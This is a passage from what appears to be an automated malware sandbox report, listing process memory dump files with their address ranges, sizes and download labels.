memory/1248-134-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1296-131-0x000001FEA98E0000-0x000001FEA9907000-memory.dmp

Filesize
156KB

Download
memory/1296-132-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1376-137-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/1376-136-0x0000013EE3490000-0x0000013EE34B7000-memory.dmp

Filesize
156KB

Download
memory/1640-139-0x0000021535970000-0x0000021535997000-memory.dmp

Filesize
156KB

Download
memory/1640-142-0x00007FFB3AF10000-0x00007FFB3AF20000-memory.dmp

Filesize
64KB

Download
memory/2148-79-0x00007FFB79100000-0x00007FFB791BD000-memory.dmp

Filesize
756KB

Download
memory/2148-78-0x00007FFB7AE80000-0x00007FFB7B089000-memory.dmp

Filesize
2.0MB

Download
memory/2332-58-0x0000017CCBBB0000-0x0000017CCBBB8000-memory.dmp

Filesize
32KB

Download
memory/2596-16-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

Filesize
10.8MB

Download
memory/2596-19-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

Filesize
10.8MB

Download
memory/2596-0-0x00007FFB6B413000-0x00007FFB6B415000-memory.dmp

Filesize
8KB

Download
memory/2596-5-0x000002A277540000-0x000002A277562000-memory.dmp

Filesize
136KB

Download
memory/2596-14-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

Filesize
10.8MB

Download
memory/2596-15-0x00007FFB6B410000-0x00007FFB6BED2000-memory.dmp

Filesize
10.8MB

Download
memory/3752-394-0x000001F9680F0000-0x000001F9680FA000-memory.dmp

Filesize
40KB

Download
memory/3752-393-0x000001F968110000-0x000001F96812C000-memory.dmp

Filesize
112KB

Download
memory/3752-395-0x000001F968150000-0x000001F96816A000-memory.dmp

Filesize
104KB

Download
memory/3752-396-0x000001F968100000-0x000001F968108000-memory.dmp

Filesize
32KB

Download
memory/3752-397-0x000001F968130000-0x000001F968136000-memory.dmp

Filesize
24KB

Download
memory/3752-398-0x000001F968140000-0x000001F96814A000-memory.dmp

Filesize
40KB

Download
memory/3752-392-0x000001F967F90000-0x000001F967F9A000-memory.dmp

Filesize
40KB

Download
memory/3752-391-0x000001F967DD0000-0x000001F967E83000-memory.dmp

Filesize
716KB

Download
memory/3752-390-0x000001F967DB0000-0x000001F967DCC000-memory.dmp

Filesize
112KB

Download